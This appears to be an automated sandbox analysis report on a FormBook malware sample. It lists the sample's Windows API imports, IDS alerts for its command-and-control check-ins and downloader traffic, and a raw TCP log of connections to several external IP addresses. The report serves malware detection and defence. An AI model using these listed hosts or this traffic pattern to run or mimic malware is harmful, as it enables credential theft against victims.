                                                                        WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                                        PSAPI.DLLGetProcessMemoryInfo
                                                                        IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                                        USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                                        UxTheme.dllIsThemeActive
                                                                        KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                                        USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                                        GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                                        COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                                        ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                                        SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                                        ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                                        OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishGreat Britain

                                                                        Network Behavior

                                                                        Suricata IDS Alerts

                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                        2024-12-13T13:07:05.530729+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449737172.67.158.23480TCP
                                                                        2024-12-13T13:07:08.252689+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449738172.67.158.23480TCP
                                                                        2024-12-13T13:07:10.908824+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449740172.67.158.23480TCP
                                                                        2024-12-13T13:07:20.468418+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449768161.97.142.14480TCP
                                                                        2024-12-13T13:07:23.138023+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449774161.97.142.14480TCP
                                                                        2024-12-13T13:07:25.936215+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449780161.97.142.14480TCP
                                                                        2024-12-13T13:07:35.326587+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449802209.74.64.5880TCP
                                                                        2024-12-13T13:07:38.014967+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449813209.74.64.5880TCP
                                                                        2024-12-13T13:07:40.722909+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449819209.74.64.5880TCP
                                                                        2024-12-13T13:08:08.290667+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.44983645.200.148.4580TCP
                                                                        2024-12-13T13:08:30.307107+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.44988645.200.148.4580TCP
                                                                        2024-12-13T13:08:35.450355+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449946104.21.74.7980TCP
                                                                        2024-12-13T13:08:38.122267+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449953104.21.74.7980TCP
                                                                        2024-12-13T13:08:40.780985+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449959104.21.74.7980TCP
                                                                        2024-12-13T13:08:50.698088+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499843.33.130.19080TCP
                                                                        2024-12-13T13:08:53.357819+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499923.33.130.19080TCP
                                                                        2024-12-13T13:08:56.049620+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4499983.33.130.19080TCP
                                                                        2024-12-13T13:09:05.300297+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002013.248.169.4880TCP
                                                                        2024-12-13T13:09:08.375339+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002713.248.169.4880TCP
                                                                        2024-12-13T13:09:11.032302+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002813.248.169.4880TCP
                                                                        2024-12-13T13:09:23.555205+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450030144.76.190.3980TCP
                                                                        2024-12-13T13:09:26.191110+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450031144.76.190.3980TCP
                                                                        2024-12-13T13:09:29.106835+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450032144.76.190.3980TCP
                                                                        2024-12-13T13:09:46.998712+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450034198.251.84.20080TCP
                                                                        2024-12-13T13:09:49.662523+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450035198.251.84.20080TCP
                                                                        2024-12-13T13:09:52.307580+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036198.251.84.20080TCP
                                                                        2024-12-13T13:10:02.206907+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450038217.160.0.6080TCP
                                                                        2024-12-13T13:10:04.777592+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450039217.160.0.6080TCP
                                                                        2024-12-13T13:10:07.610447+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450040217.160.0.6080TCP
                                                                        2024-12-13T13:10:17.022533+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450042161.97.142.14480TCP
                                                                        2024-12-13T13:10:19.888644+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450043161.97.142.14480TCP
                                                                        2024-12-13T13:10:23.366724+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450044161.97.142.14480TCP
                                                                        2024-12-13T13:10:33.107170+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450046172.67.149.6480TCP
                                                                        2024-12-13T13:10:35.778951+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450047172.67.149.6480TCP
                                                                        2024-12-13T13:10:38.435162+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048172.67.149.6480TCP
                                                                        2024-12-13T13:10:48.113015+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500503.33.130.19080TCP
                                                                        2024-12-13T13:10:50.763553+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500513.33.130.19080TCP

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Dec 13, 2024 13:06:47.225857973 CET4973680192.168.2.415.204.67.7
                                                                        Dec 13, 2024 13:06:47.345817089 CET804973615.204.67.7192.168.2.4
                                                                        Dec 13, 2024 13:06:47.345933914 CET4973680192.168.2.415.204.67.7
                                                                        Dec 13, 2024 13:06:47.357765913 CET4973680192.168.2.415.204.67.7
                                                                        Dec 13, 2024 13:06:47.477677107 CET804973615.204.67.7192.168.2.4
                                                                        Dec 13, 2024 13:06:48.766279936 CET804973615.204.67.7192.168.2.4
                                                                        Dec 13, 2024 13:06:48.766361952 CET804973615.204.67.7192.168.2.4
                                                                        Dec 13, 2024 13:06:48.766458988 CET804973615.204.67.7192.168.2.4
                                                                        Dec 13, 2024 13:06:48.766601086 CET4973680192.168.2.415.204.67.7
                                                                        Dec 13, 2024 13:06:48.770984888 CET4973680192.168.2.415.204.67.7
                                                                        Dec 13, 2024 13:06:48.890698910 CET804973615.204.67.7192.168.2.4
                                                                        Dec 13, 2024 13:07:04.229716063 CET4973780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:04.349515915 CET8049737172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:04.349600077 CET4973780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:04.360903025 CET4973780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:04.480706930 CET8049737172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:05.529803991 CET8049737172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:05.529853106 CET8049737172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:05.530729055 CET4973780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:05.531405926 CET8049737172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:05.535249949 CET4973780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:05.872021914 CET4973780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:06.895175934 CET4973880192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:07.014908075 CET8049738172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:07.015014887 CET4973880192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:07.034020901 CET4973880192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:07.153842926 CET8049738172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:08.252403975 CET8049738172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:08.252502918 CET8049738172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:08.252548933 CET8049738172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:08.252688885 CET4973880192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:08.544068098 CET4973880192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:09.563119888 CET4974080192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:09.682861090 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:09.683038950 CET4974080192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:09.695612907 CET4974080192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:09.815541029 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:09.815547943 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:09.815576077 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:09.815581083 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:09.815665960 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:09.815675974 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:09.815748930 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:09.815757990 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:09.815764904 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:10.908570051 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:10.908677101 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:10.908823967 CET4974080192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:10.909189939 CET8049740172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:10.909292936 CET4974080192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:11.200356960 CET4974080192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:12.219161987 CET4974780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:12.338851929 CET8049747172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:12.338927031 CET4974780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:12.347208023 CET4974780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:12.466928005 CET8049747172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:13.579396009 CET8049747172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:13.579413891 CET8049747172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:13.579638004 CET4974780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:13.580708027 CET8049747172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:13.580764055 CET4974780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:13.582698107 CET4974780192.168.2.4172.67.158.234
                                                                        Dec 13, 2024 13:07:13.702440023 CET8049747172.67.158.234192.168.2.4
                                                                        Dec 13, 2024 13:07:19.100761890 CET4976880192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:19.221019030 CET8049768161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:19.222850084 CET4976880192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:19.234565973 CET4976880192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:19.354324102 CET8049768161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:20.468278885 CET8049768161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:20.468355894 CET8049768161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:20.468417883 CET4976880192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:20.468424082 CET8049768161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:20.468482018 CET4976880192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:20.746993065 CET4976880192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:21.768246889 CET4977480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:21.888194084 CET8049774161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:21.888308048 CET4977480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:21.900254965 CET4977480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:22.020000935 CET8049774161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:23.137814999 CET8049774161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:23.137918949 CET8049774161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:23.137938023 CET8049774161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:23.138022900 CET4977480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:23.403548956 CET4977480192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:24.423098087 CET4978080192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:24.646851063 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:24.647047997 CET4978080192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:24.659626007 CET4978080192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:24.884551048 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:24.884574890 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:24.884588003 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:24.884599924 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:24.884604931 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:24.884609938 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:24.884615898 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:24.884620905 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:24.884625912 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:25.936115980 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:25.936146975 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:25.936188936 CET8049780161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:25.936214924 CET4978080192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:25.936270952 CET4978080192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:26.169090986 CET4978080192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:27.187920094 CET4978680192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:27.307616949 CET8049786161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:27.307753086 CET4978680192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:27.315848112 CET4978680192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:27.435621977 CET8049786161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:28.567853928 CET8049786161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:28.567878962 CET8049786161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:28.567894936 CET8049786161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:28.567909002 CET8049786161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:28.568123102 CET4978680192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:28.568177938 CET4978680192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:28.572967052 CET4978680192.168.2.4161.97.142.144
                                                                        Dec 13, 2024 13:07:28.692686081 CET8049786161.97.142.144192.168.2.4
                                                                        Dec 13, 2024 13:07:33.977802992 CET4980280192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:34.097605944 CET8049802209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:34.097698927 CET4980280192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:34.109224081 CET4980280192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:34.229104042 CET8049802209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:35.326441050 CET8049802209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:35.326520920 CET8049802209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:35.326586962 CET4980280192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:35.622216940 CET4980280192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:36.641191959 CET4981380192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:36.760864973 CET8049813209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:36.760987997 CET4981380192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:36.772923946 CET4981380192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:36.892709017 CET8049813209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:38.014288902 CET8049813209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:38.014915943 CET8049813209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:38.014966965 CET4981380192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:38.278389931 CET4981380192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:39.301182985 CET4981980192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:39.421000957 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:39.421114922 CET4981980192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:39.433037996 CET4981980192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:39.552916050 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:39.552922010 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:39.552946091 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:39.552957058 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:39.553045988 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:39.553050041 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:39.553105116 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:39.553174019 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:39.553178072 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:40.717149973 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:40.717164993 CET8049819209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:40.722908974 CET4981980192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:40.934554100 CET4981980192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:41.954359055 CET4982580192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:42.074193001 CET8049825209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:42.074282885 CET4982580192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:42.084146023 CET4982580192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:42.203859091 CET8049825209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:43.304805994 CET8049825209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:43.304907084 CET8049825209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:43.305089951 CET4982580192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:43.328356981 CET4982580192.168.2.4209.74.64.58
                                                                        Dec 13, 2024 13:07:43.448426008 CET8049825209.74.64.58192.168.2.4
                                                                        Dec 13, 2024 13:07:46.270190954 CET4983680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:07:46.390041113 CET804983645.200.148.45192.168.2.4
                                                                        Dec 13, 2024 13:07:46.390131950 CET4983680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:07:46.392812014 CET4983680192.168.2.445.200.148.45
                                                                        Dec 13, 2024 13:07:46.513077021 CET804983645.200.148.45192.168.2.4
                                                                        Dec 13, 2024 13:08:08.290463924 CET804983645.200.148.45192.168.2.4
